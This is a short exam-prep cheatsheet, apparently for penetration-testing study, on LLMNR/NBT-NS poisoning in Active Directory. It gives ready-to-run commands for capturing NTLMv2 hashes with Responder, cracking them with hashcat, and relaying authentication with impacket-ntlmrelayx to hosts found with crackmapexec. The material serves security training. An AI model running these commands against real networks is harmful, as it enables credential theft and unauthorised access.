LLMNR/NBT-NS Poisoning
Active Directory
Overview
Capture hashes via Link-Local Multicast Name Resolution and NetBIOS Name Service poisoning.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
Responder
sudo responder -I eth0 -rdwv # Start Responder on eth0
Captured Hashes
# Location /usr/share/responder/logs/ # Log directory # Format: NTLMv2 user::DOMAIN:challenge:response:... # Hash format
Crack with Hashcat
hashcat -m 5600 hash.txt wordlist.txt # Crack NTLMv2 hashes
Relay Attack
# If SMB signing disabled impacket-ntlmrelayx -tf targets.txt -smb2support # Relay NTLM auth to targets # Targets without signing crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # Find relay targets
Command Examples
Common Pitfalls
- Responder can cause network issues
- Only works on local subnet
- NTLMv2 can be slow to crack
Exam Survival Tips
- Run Responder early, capture while enumerating
- Check for SMB signing for relay
- Use strong wordlist + rules